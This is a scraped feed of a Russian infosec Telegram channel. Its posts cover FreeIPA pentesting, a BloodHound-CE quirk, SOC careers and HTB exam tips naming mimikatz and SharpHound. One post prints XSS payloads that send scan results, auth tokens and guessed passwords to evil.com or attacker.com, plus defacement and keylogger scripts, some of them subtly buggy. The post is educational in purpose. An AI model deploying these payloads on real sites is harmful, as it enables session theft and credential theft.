FreeIPA, would you?😉
И нет, речь не о бесплатной ипе в банке с последней конфы😋
Собственно, не так давно отгремел OFFZONE 2024, где одной из тем докладов стала FreeIPA.
Этот пост будет беглым ознакомлением о том, с чем кушац эту вашу FreeIPA.
😳 Так о чем речь?
Коротко:
То есть этакий аналог с открытым исходным кодом всем уже давно знакомой Active Directory, но для линухов.
😦 Немножко больше инфы для общего понимания
База с freeipa.org
Ее возможности:
➡️ Управлять пользователями и группами: создавать, редактировать, удалять учетные записи пользователей и групп.
➡️ Управлять доступом: назначать права доступа к файлам, каталогам, системам и приложениям.
➡️ Автоматизировать задачи: использовать автоматизацию для рутинных задач управления доступом.
➡️ Обеспечивать безопасность: использовать аутентификацию Kerberos, SSO и другие функции для повышения безопасности.
🥰 Ha-hack FreeIPA
Сразу хочется отметить одну из интересных особенностей это отсутствие NTLM-аутентификации.
Также в FreeIPA используется полностью своя LDAP структура, но можно юзать старый добрый ldapsearch.
Что по Kerberos:
▪️ User enum (kerbrute)
▪️ Password spraying (kerbrute)
▪️ Дамп тикетов (tickey)
▪️ Получение ключа хоста (/etc/krb5.keytab)
Ну и естественно можно найти всякие интересные CVE.
😳 Итог:
Мало доков, нет готовых автоматизированных решений для поиска уязвимостей, но зато открытый исходый код для тех, кто хочет узнать, что там под капотом.
👍 Тот самый доклад с OFFZONE для ознакомления:
Pentest FreeIPA, или Углубляемся в зоопарк
#redteam
И нет, речь не о бесплатной ипе в банке с последней конфы
Собственно, не так давно отгремел OFFZONE 2024, где одной из тем докладов стала FreeIPA.
Этот пост будет беглым ознакомлением о том, с чем кушац эту вашу FreeIPA.
Коротко:
FreeIPA:централизованное управление идентификацией и доступом
То есть этакий аналог с открытым исходным кодом всем уже давно знакомой Active Directory, но для линухов.
Ее возможности:
Сразу хочется отметить одну из интересных особенностей это отсутствие NTLM-аутентификации.
Если не хочешь, чтобы релеили твой NTLM, не юзай NTLM💅
Также в FreeIPA используется полностью своя LDAP структура, но можно юзать старый добрый ldapsearch.
Что по Kerberos:
Ну и естественно можно найти всякие интересные CVE.
Мало доков, нет готовых автоматизированных решений для поиска уязвимостей, но зато открытый исходый код для тех, кто хочет узнать, что там под капотом.
Pentest FreeIPA, или Углубляемся в зоопарк
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍3🫡2🔥1
REDtalk
💥 Привет. Решил я значит перейти с bloodhound на bloodhound-ce, так как первый перестал поддерживаться. Делюсь опытом: *️⃣ Ставится одной командой запуска контейнеров. Хоть и предыдущий бладхаунд тоже был прост в развертывании, там не было единого docker…
💥 Привет, недавно я делал пост про странную логику Bloodhound-CE при работе с Owned и High Value пользователях.
Проблема была в кривом отображении UI и сбросе данных после перезагрузки при ручной пометке через Neo4j.
Я пошел смотреть исходники и обнаружил преинтереснейшую вещь — В отличии от предыдущего бладхаунда, тут, помимо приложухи и Neo4j в стек добавилась Postgres. Если раньше аутентификация проводилось только через bolt в Neo4j, то тут добавляется еще и аутентификация в саму GUI. Вот эта инфа, и другие настройки, типа Custom Queries хранятся в постгресе.
И (уже не первый раз) я удивился, когда увидел, что там в отдельной таблице хранятся данные об Owned и High-Value нодах.
Из запроса можно увидеть 2 таблицы, одна из которых (нижняя) содержит теги и ID этих тегов, вторая (верхняя) совмещает SID объектов AD с этими ID. То-есть у меня в бладхаенде есть 4 пользака, помеченные как Owned.
И после перезагрузки все свойства system-tags, что было отмечено в Neo4J обнуляются и устанавливаются вот эти четыре.
Нет слов, одни эмоции, не знаю, зачем разработчики сделали такую логику. Наверное стоит завести Issue на гитхабе
#redteam
Проблема была в кривом отображении UI и сбросе данных после перезагрузки при ручной пометке через Neo4j.
Я пошел смотреть исходники и обнаружил преинтереснейшую вещь — В отличии от предыдущего бладхаунда, тут, помимо приложухи и Neo4j в стек добавилась Postgres. Если раньше аутентификация проводилось только через bolt в Neo4j, то тут добавляется еще и аутентификация в саму GUI. Вот эта инфа, и другие настройки, типа Custom Queries хранятся в постгресе.
И (уже не первый раз) я удивился, когда увидел, что там в отдельной таблице хранятся данные об Owned и High-Value нодах.
bloodhound=# select * from asset_group_selectors;
---+------------------+------------------+---+----+-------------------------------+------------------------------
1 | S-1-<SNIP>-17251 | S-1-<SNIP>-17251 | f | 1 | 2024-09-02 09:34:55.977957+00 | 2024-09-02 09:34:55.977957+00
1 | S-1-<SNIP>-7261 | S-1-<SNIP>-7261 | f | 3 | 2024-09-02 10:51:05.968531+00 | 2024-09-02 10:51:05.968531+00
1 | S-1-<SNIP>-13965 | S-1-<SNIP>-13965 | f | 4 | 2024-09-02 10:51:10.386376+00 | 2024-09-02 10:51:10.386376+00
1 | S-1-<SNIP>-21856 | S-1-<SNIP>-21856 | f | 5 | 2024-09-02 11:29:49.443476+00 | 2024-09-02 11:29:49.443476+00
(4 rows)
bloodhound=# select * from asset_groups;
name | tag | system_group | id | created_at | updated_at
-----------------+--------------+--------------+----+-------------------------------+-------------------------------
Owned | owned | t | 1 | |
Admin Tier Zero | admin_tier_0 | t | 2 | 2024-08-28 12:34:58.093203+00 | 2024-08-28 12:34:58.093203+00
(2 rows)
Из запроса можно увидеть 2 таблицы, одна из которых (нижняя) содержит теги и ID этих тегов, вторая (верхняя) совмещает SID объектов AD с этими ID. То-есть у меня в бладхаенде есть 4 пользака, помеченные как Owned.
И после перезагрузки все свойства system-tags, что было отмечено в Neo4J обнуляются и устанавливаются вот эти четыре.
Нет слов, одни эмоции, не знаю, зачем разработчики сделали такую логику. Наверное стоит завести Issue на гитхабе
#redteam
👍5🔥4
SOC на аутсорсе 💰 или in-house SOC 🧃
Что бы выбрали вы?
Мы как то рассказывали, что это такое и в чем отличия, поговорим теперь о работе в данных организациях с точки зрения сотрудника, понятно, то что есть в одной компании, будет отсутствовать в другой, но так как я поработал и там и там расскажу о тех моментах, с которыми мне пришлось столкнуться.
Начнем с SOC-а на аутсорсе.
Плюсы➕:
1. Четкое разграничение ответственности
Моя первая работа в качестве SOC аналитика началась именно там, поначалу безумно нравилось тем, что при заключении договора, есть четкая документация, в рамках которой ты работаешь, в целом все понятно и прозрачно, кому что писать, у кого что спрашивать;
2. Работодатель более охотно оплачивает курсы, платные митапы
Компания заинтересована в вашем развитии, т.к. вы тот актив, который приносит деньги, и от качества предоставляемой услуги, зависит удовлетворенность заказчика и следовательно продление\подписание новых контрактов;
3. Большая команда
Как правило именно тут команда SOC будет больше, т.к. такой SOC создается под несколько компаний, а следовательно больше людей - больше компетенций.
Минусы➖:
1. Не вовлеченность заказчика
Как и многие мои коллеги, я столкнулся с проблемой, что услуга SOC приобреталась с целью отчета перед регулятором о том, что инфраструктуру мониторят, а если это так, то у вас целый букет проблем
Запросы о предоставлении дополнительной информации, необходимой для расследования инцидента, могут висеть неделями, рекомендации об устранении инцидента могут игнорироваться, а сбор дополнительных событий будет расцениваться как попытка саботажа и отвергнута по причине излишней нагрузки на сеть;
2. Ощущение работы в пустую
Вытекает из предыдущего минуса, и начинаешь ощущать это тогда, когда хочешь сделать что то хорошо, тратишь на решение какой то проблемы время, но от твоих идей отказываются за ненадобностью;
3. Достаточно высокая нагрузка
Как правило на мониторинге находятся несколько компаний и периодически случается так, что иногда не хватает времени на то, что бы нормально поесть.
Итог:
На мой взгляд, это отличное место для старта карьеры, как правило, в таких SOC-ах, большая часть процессов выстроена и следовательно не нужно изобретать велосипед. Сотрудников больше чем в in-house, следовательно всегда есть человек, который может что-то подсказать. Но я там не смог долго проработать по ряду причин, одна из которых это ощущение работы в пустую.
Был ли у вас опыт работы в SOC-е на аутсорсе, и с какими нюансами работы сталкивались вы?
В следующей статье, расскажу про нюансы работы в in-house SOC-е
#SOC #blueteam #REDtalk
Что бы выбрали вы?
Мы как то рассказывали, что это такое и в чем отличия, поговорим теперь о работе в данных организациях с точки зрения сотрудника, понятно, то что есть в одной компании, будет отсутствовать в другой, но так как я поработал и там и там расскажу о тех моментах, с которыми мне пришлось столкнуться.
Начнем с SOC-а на аутсорсе.
Плюсы➕:
1. Четкое разграничение ответственности
Моя первая работа в качестве SOC аналитика началась именно там, поначалу безумно нравилось тем, что при заключении договора, есть четкая документация, в рамках которой ты работаешь, в целом все понятно и прозрачно, кому что писать, у кого что спрашивать;
2. Работодатель более охотно оплачивает курсы, платные митапы
Компания заинтересована в вашем развитии, т.к. вы тот актив, который приносит деньги, и от качества предоставляемой услуги, зависит удовлетворенность заказчика и следовательно продление\подписание новых контрактов;
3. Большая команда
Как правило именно тут команда SOC будет больше, т.к. такой SOC создается под несколько компаний, а следовательно больше людей - больше компетенций.
Минусы➖:
1. Не вовлеченность заказчика
Как и многие мои коллеги, я столкнулся с проблемой, что услуга SOC приобреталась с целью отчета перед регулятором о том, что инфраструктуру мониторят, а если это так, то у вас целый букет проблем
Запросы о предоставлении дополнительной информации, необходимой для расследования инцидента, могут висеть неделями, рекомендации об устранении инцидента могут игнорироваться, а сбор дополнительных событий будет расцениваться как попытка саботажа и отвергнута по причине излишней нагрузки на сеть;
2. Ощущение работы в пустую
Вытекает из предыдущего минуса, и начинаешь ощущать это тогда, когда хочешь сделать что то хорошо, тратишь на решение какой то проблемы время, но от твоих идей отказываются за ненадобностью;
3. Достаточно высокая нагрузка
Как правило на мониторинге находятся несколько компаний и периодически случается так, что иногда не хватает времени на то, что бы нормально поесть.
Итог:
На мой взгляд, это отличное место для старта карьеры, как правило, в таких SOC-ах, большая часть процессов выстроена и следовательно не нужно изобретать велосипед. Сотрудников больше чем в in-house, следовательно всегда есть человек, который может что-то подсказать. Но я там не смог долго проработать по ряду причин, одна из которых это ощущение работы в пустую.
Был ли у вас опыт работы в SOC-е на аутсорсе, и с какими нюансами работы сталкивались вы?
В следующей статье, расскажу про нюансы работы в in-house SOC-е
#SOC #blueteam #REDtalk
🔥9👍2
Доброго времени суток, друзья!🎉 У нас небольшие изменения на канале! 🛠️ !
Мы рады представить обновленный состав нашей команды авторов🥰 :
@closed_character - red team
@pyfffe - red team
@Huioofy - red team
Мы всегда стремимся улучшить ваш опыт, поэтому решили добавить хештеги для удобной навигации по контенту канала#️⃣ :
#redteam - статьи и посты из мира ИБ со стороны нападения
#blueteam - статьи и посты из мира ИБ со стороны защиты
#REDtalk - новости и анонсы канала
#meme - мемы наше все
#ToolTricks - различные интересные лайфхаки или обзоры инструментов несвязанных с red team или blue team
Мы рады представить обновленный состав нашей команды авторов
@closed_character - red team
@pyfffe - red team
@Huioofy - red team
Мы всегда стремимся улучшить ваш опыт, поэтому решили добавить хештеги для удобной навигации по контенту канала
#redteam - статьи и посты из мира ИБ со стороны нападения
#blueteam - статьи и посты из мира ИБ со стороны защиты
#REDtalk - новости и анонсы канала
#meme - мемы наше все
#ToolTricks - различные интересные лайфхаки или обзоры инструментов несвязанных с red team или blue team
Please open Telegram to view this post
VIEW IN TELEGRAM
Можно ли сделать телеграм-бота без использования специализированных фреймворков и навыков программирования?
Конечно можно.
Тут присутствует задержка между спреями для избежания блокировки, и время сна, на случай, если что-то положится, то хотя бы не ночью. И конечно же подключён бот, буквально двумя строками кода
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Привет, друзья! 👋
Принёс вам историю из реальных кейсов по пентесту — всё как вы любите: взломы, стрельба, горящие админы.🔥 Готовьте попкорн, потому что будет жарко! 😎
Всем приятного чтения, а я дальше пойду добивать свой отпуск!🏖️
Ссылочка на статью: https://shankdy.notion.site/112cfaa22e1e8017a274c546dee209d5
#redteam
Принёс вам историю из реальных кейсов по пентесту — всё как вы любите: взломы, стрельба, горящие админы.
Всем приятного чтения, а я дальше пойду добивать свой отпуск!
Ссылочка на статью: https://shankdy.notion.site/112cfaa22e1e8017a274c546dee209d5
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
shankdy on Notion
За закрытыми дверьми: корпоративная сеть глазами хакеров | Notion
Автор: @closed_character
Нежданно-негаданно приехала новая часть постов про антивирусы.
Это третья часть из серии постов про мой опыт изучения работы антивирусных средств и EDR. В ней была проведена работа над ошибками предыдущих частей и далее рассказано и показано про работу meterpreter и msfvenom.
Ссылка:
Основная её цель - показать, что у метерпретера, и метасплоита существует
Приятного чтения!
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
pyfffe on Notion
Неправильный обход антивирусов. Часть 3. Работа над ошибками | Notion
Введение
« Всё это было только ради поста ( @pyfffe ) »
💥 Привет! А я тут🔗 налутал HTB CPTS и спешу поделиться мыслями и лайфхаками по этому сертификату. Для начала несколько вступительных слов.
❓ Что там за задание?
Дан лабораторный стенд с эмуляцией инфраструктуры небольшой компании, с линуксами и виндовсоми. Цель — взломать и написать отчёт по проведению пентеста. Присутствует возможность полной перезагрузки стенда.
❓ Какие ограничения?
Дедлайн — 10 дней включительно (также входит одна попытка на пересдачу). В инструментах не ограничивают. Прокторинга нет. Шаблон для отчета дадут.
Теперь лайфхаки:
*️⃣ Во первых очень важно спланировать свое время. Может показаться, что 10 дней — это много, но в моём случае потребовалось тратить по 8-10 часов в день. Если же у вас нет столько свободного времени, можно использовать еще 10 дней из попытки пересдачи. Также выделите несколько дней на оформление отчета.
*️⃣ Перед началом сдачи подготовьте рабочее пространство. Убедитесь, что у вас работает то, о чем говорить нельзя, и сетевой VPN трафик до стенда не блокируется. Если его всё-таки блокируют, то есть два выхода:
1️⃣ Первый - использовать предоставленный для сдачи экзамена Pwnbox (выделенную виртуальную машину с ParrotOS), но у него два основных минуса - это подключение по VNC через браузер, без возможности ctrl+c ctrl+v, и ограниченное время работы, из-за чего приходится перезапускать виртуалку. В общем, это не мой путь 💀
2️⃣ Второй выход - это арендовать VPS, с которого будет работать OpenVPN к лабе, и работать через него. Больше гемора с настройкой, но удобнее и реалистичнее
*️⃣ Вы единственный пользователь стенда, а значит ничего не мешяет добавить туда такие вектора атак, которые неприменимы для обычных HTB-Коробок.
*️⃣ В отчете нужно будет показать все шаги компрометации так, чтобы это смогла повторить бабушка админа, поэтому логируйте каждый шаг взлома, Включая, к примеру,
*️⃣ Лаба несложная, zero-day нет, Вся информация есть либо на HTB Academy, либо в гугле. Однако, тут много кроличьих нор, из-за чего необходимо досконально проверять каждый предположительный вектор атаки.
Ну вот вроде всё. У меня сдача заняла 9 дней, отчет проверяли 5 рабочих дней. Результатом доволен 👾
#redteam
💥 Привет! А я тут
Дан лабораторный стенд с эмуляцией инфраструктуры небольшой компании, с линуксами и виндовсоми. Цель — взломать и написать отчёт по проведению пентеста. Присутствует возможность полной перезагрузки стенда.
Дедлайн — 10 дней включительно (также входит одна попытка на пересдачу). В инструментах не ограничивают. Прокторинга нет. Шаблон для отчета дадут.
Теперь лайфхаки:
mimicatz.exe lsadump::sam и sharphound.exe -c All.Ну вот вроде всё. У меня сдача заняла 9 дней, отчет проверяли 5 рабочих дней. Результатом доволен 👾
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Я слишком долго вынашивал идею про особенности работы в 🏪In-house SOC т.к. тут все намного сложнее, чем в SOC-e на аутсорсе
Плюсы и минусы обратны тем, что я описывал тут.
А так, все очень сильно зависит от многих факторов🧮
🦾 Уровня зрелости SOC-a
💰Финансирования
📈Стратегий руководства
Это все можно понять, ответив на следующие вопросы📝
- Сколько людей в команде
- Какие есть направления
- Какие продукты используются в работе
- Какие задачи ставятся перед сотрудником/отделом
- Есть ли какие то проблемы в данный момент у отдела и как планируется их решать
- Как руководство относится к посещению различных мероприятий по ИБ
- Какой бэкграунд у лида, от этого будут зависеть качество поставленных задач и ваше дальнейшее развитие
По итогу, если вы найдете крутую кибербезную (или делает все, что бы ей стать👨💻) команду, вы можете столкнуться со следующими моментами:
- Многие проблемные вопросы решаются как правило проще и быстрее (проигнорированные запросы, недопонимание со стороны it)
- Идеи каждого члена команды могут быть услышаны и реализованы на практике, т.к. ваша деятельность не ограничена контрактом на предоставление конкретной услуги, вы, как подразделение, отвечаете за обеспечение безопасности компании
Вообще, цель моих статей, помочь начинающим специалистам чуть лучше понять, как устроен SOC и на что смотреть при выборе компаний.
Лично мой совет:
Прежде чем выходить на рынок труда, вам нужно определить, чем именно вы хотите заниматься и что для вас важно, а дальше из этого сформировать ваш список вопросов, которые необходимо задавать на собеседованиях, это, на мой взгляд, одна из самых важных его частей, потому что важно выяснить не только подходите ли вы компании, но и подходит ли данная компания вам, и вы не уволитесь через пару недель после трудоустройства, разочаровавшись в задачах, команде и подхода к работе.
#SOC #blueteam
Плюсы и минусы обратны тем, что я описывал тут.
А так, все очень сильно зависит от многих факторов🧮
🦾 Уровня зрелости SOC-a
💰Финансирования
📈Стратегий руководства
Это все можно понять, ответив на следующие вопросы📝
- Сколько людей в команде
- Какие есть направления
- Какие продукты используются в работе
- Какие задачи ставятся перед сотрудником/отделом
- Есть ли какие то проблемы в данный момент у отдела и как планируется их решать
- Как руководство относится к посещению различных мероприятий по ИБ
- Какой бэкграунд у лида, от этого будут зависеть качество поставленных задач и ваше дальнейшее развитие
По итогу, если вы найдете крутую кибербезную (или делает все, что бы ей стать👨💻) команду, вы можете столкнуться со следующими моментами:
- Многие проблемные вопросы решаются как правило проще и быстрее (проигнорированные запросы, недопонимание со стороны it)
- Идеи каждого члена команды могут быть услышаны и реализованы на практике, т.к. ваша деятельность не ограничена контрактом на предоставление конкретной услуги, вы, как подразделение, отвечаете за обеспечение безопасности компании
Вообще, цель моих статей, помочь начинающим специалистам чуть лучше понять, как устроен SOC и на что смотреть при выборе компаний.
Лично мой совет:
Прежде чем выходить на рынок труда, вам нужно определить, чем именно вы хотите заниматься и что для вас важно, а дальше из этого сформировать ваш список вопросов, которые необходимо задавать на собеседованиях, это, на мой взгляд, одна из самых важных его частей, потому что важно выяснить не только подходите ли вы компании, но и подходит ли данная компания вам, и вы не уволитесь через пару недель после трудоустройства, разочаровавшись в задачах, команде и подхода к работе.
#SOC #blueteam
Telegram
REDtalk
SOC на аутсорсе 💰 или in-house SOC 🧃
Что бы выбрали вы?
Мы как то рассказывали, что это такое и в чем отличия, поговорим теперь о работе в данных организациях с точки зрения сотрудника, понятно, то что есть в одной компании, будет отсутствовать в другой,…
Что бы выбрали вы?
Мы как то рассказывали, что это такое и в чем отличия, поговорим теперь о работе в данных организациях с точки зрения сотрудника, понятно, то что есть в одной компании, будет отсутствовать в другой,…
Работа в какой компании на ваш взгляд кажется более интересной\перспективной?
Anonymous Poll
27%
In-house SOC
17%
SOC на аутсорсе
56%
Какой SOC, пентест - тема
Привет, друзья! 😻
Немного дружественного контента. Сегодня в 20:00 наш хороший товарищ и коллега Владимир Кочанов, с которым мы не раз обсуждали безопасность бизнеса, в том числе в рамках информационной безопасности, проведет стрим на тему: «Как понять, что пора создавать службу безопасности?»
Владимир поделится опытом и ответит на важные вопросы:
🔸 На каком этапе развития компании становится критично задуматься о безопасности?
🔸 Как донести до акционеров, что безопасность — это инвестиция, а не пустая трата?
Если думаете, как провести вечер, — рекомендуем присоединиться!👍
🔗 Ссылка на стрим: https://t.me/sbprobiz?livestream
Немного дружественного контента. Сегодня в 20:00 наш хороший товарищ и коллега Владимир Кочанов, с которым мы не раз обсуждали безопасность бизнеса, в том числе в рамках информационной безопасности, проведет стрим на тему: «Как понять, что пора создавать службу безопасности?»
Владимир поделится опытом и ответит на важные вопросы:
🔸 На каком этапе развития компании становится критично задуматься о безопасности?
🔸 Как донести до акционеров, что безопасность — это инвестиция, а не пустая трата?
Если думаете, как провести вечер, — рекомендуем присоединиться!
🔗 Ссылка на стрим: https://t.me/sbprobiz?livestream
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
СБ Про Бизнес | Безопасность
Канал для бизнеса о безопасности в бизнесе! Ритейл и производство, логистика и автотранспорт - безопасность может быть полезной для бизнеса!
"Держать и не пущщать" — это не про нас😉
Автор @vladimir_sbprobiz
Реклама на канале: https://telega.in/c/sbprobiz
"Держать и не пущщать" — это не про нас😉
Автор @vladimir_sbprobiz
Реклама на канале: https://telega.in/c/sbprobiz
Я хочу осветить несколько необычных векторов атак, которые можно использовать при различных инъекциях в веб-страницу, помимо кражи сессии из кук.
async function checkPort(ip) {
try {
const controller = new AbortController();
const timeout = setTimeout(() => controller.abort(), 2000); // Таймаут 2 секунды
const response = await fetch(`http://${ip}`, {
method: 'HEAD',
signal: controller.signal
});
clearTimeout(timeout);
if (response.ok) {
fetch(`https://evil.com/open?ip=${ip}`);
}
} catch (e) {
}
}
async function scanNetwork(startIP, endIP) {
const start = "192.168.1."
for (let octet= 1; octet<= 254; ipNum++) {
const ip = start + String(octet)
checkPort(ip); // Проверяем каждый IP
}
}
// Запуск сканера
scanNetwork(startIP, endIP);fetch("https://evil.com/steal", {
method: "POST",
headers: {
"Authorization": localStorage.getItem("authToken"),
},
});const attackServer = "https://attacker.com/report";
// Список паролей можно подгрузить запросом к сайту злоумышленника
const passwords = ["password123", "admin", "123456", "qwerty"];
passwords.forEach(password => {
fetch("https://mail.google.com/login", {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({
username: "admin",
password: password
})
})
.then(response => {
// Отправляем найденные креды
if (response.status === 200) {
fetch(attackServer, {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({ username: "admin", password: password })
});
}
});
});
<продолжение далее>
Please open Telegram to view this post
VIEW IN TELEGRAM
<продолжение>
4️⃣ Если обнаружена хранимая XSS где-то на главной странице, то можно сделать дефейс, то есть изменить содержание страницы и добавить лозунги про квадроберов, или просто сделать страницу нефункциональной:
5️⃣ Помимо дефейса можно внедрить свои рекламные баннеры. Такой вектор обычно используется вирусами на скомпрометированном компьютере пользователя, но можно и через HTML-Injection:
6️⃣ Кейлоггер. Да, это тоже можно сделать, причем очень просто, через встроенный ивент onkeypress:
Как-то так👀
Цель этого поста — показать, что, несмотря на эволюцию браузеров за последние 10 лет, XSS-уязвимости всё еще могут наносить серьезный импакт.
#redteam
<script>document.body.innerHTML="<h1>Этот сайт был взломан. Все данные пользователей скомпрометированы</h1>";</script>
<div id="ad" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: white; z-index: 1000; display: flex; justify-content: center; align-items: center;">
<div style="position: relative; background: #f9f9f9; padding: 20px; border: 1px solid #ccc; box-shadow: 0 0 10px rgba(0,0,0,0.2);">
<div style="position: absolute; top: -10px; right: -10px; cursor: pointer;" onclick="document.getElementById('ad').remove();">❌</div>
<h3>Special Offer!</h3>
<p>Click below to learn more:</p>
<a href="https://example.com" target="_blank">Learn More</a>
</div>
</div>
<script>
var l = "";
document.onkeypress = function (e) {
l + e.key;
console.log(l); // Можно отправлять каждый введенный символ на наш сервер
}
</script>
Как-то так
Цель этого поста — показать, что, несмотря на эволюцию браузеров за последние 10 лет, XSS-уязвимости всё еще могут наносить серьезный импакт.
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Хотим рассказать про канал наших друзей (да, у нас такие есть) и коллег по цеху. Там вы найдете заметки про Ред и Блю тим, и в целом про техническую ИБ.
Приглашаем в RedBlue Notes
Please open Telegram to view this post
VIEW IN TELEGRAM
👌8
В мире безопасности есть свои "синие" — те, кто держит защиту под контролем, "красные" — те, кто не даёт им расслабляться, "фиолетовые" — те, кто объединяет усилия первых двух, и даже "жёлтые" — всегда готовые внести свежие идеи и нестандартные подходы к безопасности. Это не просто работа, а целая палитра усилий, где каждый цвет добавляет что-то важное
Пусть инструменты работают,
идеи сверкают, а времени на отдых всегда хватает. Спасибо всем, кто делает этот цифровой мир ярче и безопаснее!
#REDtalk
Please open Telegram to view this post
VIEW IN TELEGRAM